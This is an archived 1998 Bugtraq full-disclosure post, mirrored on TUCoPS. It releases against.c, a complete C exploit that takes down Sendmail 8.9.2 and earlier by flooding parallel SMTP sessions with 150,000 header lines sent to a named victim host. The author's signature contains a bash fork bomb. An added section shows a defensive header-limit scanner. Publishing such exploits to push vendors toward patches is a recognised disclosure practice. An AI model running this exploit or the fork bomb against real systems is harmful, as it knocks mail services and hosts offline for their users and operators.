TUCoPS :: Unix :: General :: sendma.txt



Denial of service attack in Sendmail 8.9.2 with exploit.

[ http://www.rootshell.com/ ]
Date: 12 Dec 1998 19:39:56 +0100
From: Michal Zalewski <lcamtuf@IDS.PL>
To: BUGTRAQ@netspace.org
Subject: ** Sendmail 8.9.2 DoS - exploit ** get what you want!
Hello again. Yesterday, I published some rather laconic information about
two bugs in Sendmail up to 8.9.2, and decided to post only short description
of problem + suggested patch (instead of exploit), to give developers a
chance. Unfortunately, I put together information about two completely
different problems in a single posting, and it confused a lot of people. So,
to kill any senseless discussions - again:
- The first one was 'redirection attack'; I said you could call it 'bug'
 instead of 'feature', but as no one likes anonymous mailbombing,
 network overloading / scanning, it's good to apply sendmail.cf patch
 included in original posting; without it, your relay could be abused in
 many painful ways. And yes, attack has been confirmed with 8.9.2 and
 sendmail.cf from 8.9.2 with relaying enabled. I don't think there's
 anything left to talk about. Dot.
- The second one was DoS attack during headers parsing - and this is
 a bug, *confirmed on 8.9.2*. I included simple patch to source tree.
 Unfortunately, all feedback we received from developers was one-line
 response 'It has been fixed in 8.9.2'. Bullshit (sorry). I decided
 not to publish an exploit, but now I realized there's no chance for
 response from vendors if there's no real danger. So here it is.
 Attached file, against.c, should perform very 'light' attack, only
 for testing purposes. If you noticed increased LA during attack,
 your machine is vulnerable. You had enough time to patch your system
 - don't blame me, but vendors. EOF.
_______________________________________________________________________
Michal Zalewski [lcamtuf@ids.pl] [ENSI / marchew] [dione.ids.pl SYSADM]
[http://linux.lepszy.od.kobiety.pl/~lcamtuf/] <=--=> bash$ :(){ :|:&};:
[voice phone: +48 (0) 22 813 25 86] ? [pager (MetroBip): 0 642 222 813]
To iterate is human, to recurse divine [P. Deutsch]
-------------------------------------------------------------------------
/*
 against.c - Another Sendmail (and pine ;-) DoS (up to 8.9.2)
 (c) 1999 by <marchew@linux.lepszy.od.kobiety.pl>
 Usage: ./against existing_user_on_victim_host victim_host
 Example: ./against nobody lamers.net

 Opens MAXCONN parallel SMTP sessions and, inside each DATA phase,
 feeds the server LINES copies of the same header line before the
 body. The cost of parsing that header block on the receiving side
 is what drives the load average up.
*/
#include <stdio.h>
#include <unistd.h>
#include <sys/param.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <sys/wait.h>        /* waitpid(); missing from the original listing */
#include <netinet/in.h>
#include <netdb.h>
#include <stdarg.h>
#include <errno.h>
#include <signal.h>
#include <getopt.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>         /* bcopy() */

#define MAXCONN 5            /* parallel SMTP sessions, one child each */
#define LINES 150000         /* header lines sent in every session */

struct hostent *hp;
struct sockaddr_in s;
int suck, loop, x;

int main(int argc, char *argv[]) {
    int status;

    printf("against.c - another Sendmail DoS (up to 8.9.2)\n");
    if (argc != 3) {
        printf("Usage: %s victim_user victim_host\n", argv[0]);
        exit(0);
    }

    hp = gethostbyname(argv[2]);
    if (!hp) {
        perror("gethostbyname");
        exit(1);
    }

    fprintf(stderr, "Doing mess: ");
    for (; loop < MAXCONN; loop++) if (!(x = fork())) {
        /* child: one complete SMTP session against port 25 */
        FILE *d;
        int i;

        bcopy(hp->h_addr, (void *)&s.sin_addr, hp->h_length);
        s.sin_family = hp->h_addrtype;
        s.sin_port = htons(25);
        if ((suck = socket(AF_INET, SOCK_STREAM, 0)) < 0) { perror("socket"); exit(1); }
        if (connect(suck, (struct sockaddr *)&s, sizeof(s))) { perror("connect"); exit(1); }
        if (!(d = fdopen(suck, "w"))) { perror("fdopen"); exit(0); }

        /* minimal envelope; server replies are never read, only timed past */
        usleep(100000);
        fprintf(d, "helo tweety\n");
        fprintf(d, "mail from: tweety@polbox.com\n");
        fprintf(d, "rcpt to: %s@%s\n", argv[1], argv[2]);
        fprintf(d, "data\n");
        usleep(100000);

        /* the payload: LINES identical header lines, one dot per 100 */
        for (i = 0; i < LINES; i++) {
            if (!(i % 100)) fprintf(stderr, ".");
            fprintf(d, "To: x\n");
        }
        fprintf(d, "\n\n\nsomedata\n\n\n");
        fprintf(d, ".\n");
        sleep(1);
        fprintf(d, "quit\n");
        fflush(d);

        sleep(100);          /* hold the session open while the server works */
        shutdown(suck, 2);
        close(suck);
        exit(0);
    }

    /* parent: waits only for the last child it forked, as in the original */
    waitpid(x, &status, 0);
    fprintf(stderr, "ok\n");
    return 0;
}
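
The receiving side of the attack above is a header parser that does work proportional to the number of header lines it is fed before it decides whether to accept the message. The following bounded header scanner is an added example, not code from the original post and not Sendmail's own fix (which this page does not show); the limits MAX_HEADER_LINES and MAX_HEADER_BYTES, the function names and the constructed test payload are all assumptions. It stops at the first limit exceeded, so a flood of LINES copies of "To: x" costs at most MAX_HEADER_BYTES of scanning instead of LINES header parses.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Illustrative limits (assumed values, not Sendmail's). */
#define MAX_HEADER_LINES 1000
#define MAX_HEADER_BYTES 32768

enum hdr_result { HDR_OK = 0, HDR_TOO_MANY_LINES = 1, HDR_TOO_LARGE = 2 };

/*
 * Walk the header section of a DATA payload (everything up to the first
 * empty line, LF or CRLF) and stop as soon as either limit is exceeded.
 * Nothing is parsed or stored before the bound is checked, so the cost
 * of a header flood is capped before any per-header work happens.
 */
enum hdr_result check_headers(const char *data, size_t *lines_out, size_t *bytes_out)
{
    size_t lines = 0, bytes = 0;
    const char *p = data;
    enum hdr_result r = HDR_OK;

    while (*p) {
        const char *nl = strchr(p, '\n');
        size_t len = nl ? (size_t)(nl - p) : strlen(p);

        /* empty line terminates the header section */
        if (len == 0 || (len == 1 && p[0] == '\r'))
            break;

        lines++;
        bytes += len + 1;
        if (lines > MAX_HEADER_LINES) { r = HDR_TOO_MANY_LINES; break; }
        if (bytes > MAX_HEADER_BYTES) { r = HDR_TOO_LARGE; break; }

        if (!nl) break;          /* headers ran to end of input, no body */
        p = nl + 1;
    }
    if (lines_out) *lines_out = lines;
    if (bytes_out) *bytes_out = bytes;
    return r;
}

/*
 * Constructed payload in the shape against.c sends: n copies of "To: x\n",
 * an empty line, and a short body. Caller frees the buffer.
 */
char *build_header_flood(size_t n)
{
    const char *line = "To: x\n";
    size_t ll = strlen(line), i;
    char *buf = malloc(n * ll + 32);
    if (!buf) return NULL;
    for (i = 0; i < n; i++)
        memcpy(buf + i * ll, line, ll);
    strcpy(buf + n * ll, "\nsomedata\n");
    return buf;
}

int main(void)
{
    size_t lines = 0, bytes = 0;
    char *flood = build_header_flood(150000);   /* same count as LINES above */
    enum hdr_result r;

    if (!flood) return 1;
    r = check_headers(flood, &lines, &bytes);
    printf("flood: result=%d stopped after %zu lines, %zu bytes\n", r, lines, bytes);
    free(flood);

    r = check_headers("From: a@b\r\nTo: c@d\r\n\r\nbody\r\n", &lines, &bytes);
    printf("normal: result=%d %zu lines, %zu bytes\n", r, lines, bytes);
    return 0;
}
```

Either limit on its own is insufficient: a count-only limit still allows a few enormous headers, and a size-only limit still allows tens of thousands of tiny ones, so the scanner enforces both. A server using it would answer the DATA phase with a permanent failure once check_headers() returns anything but HDR_OK, and would do so before running its real header parser.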
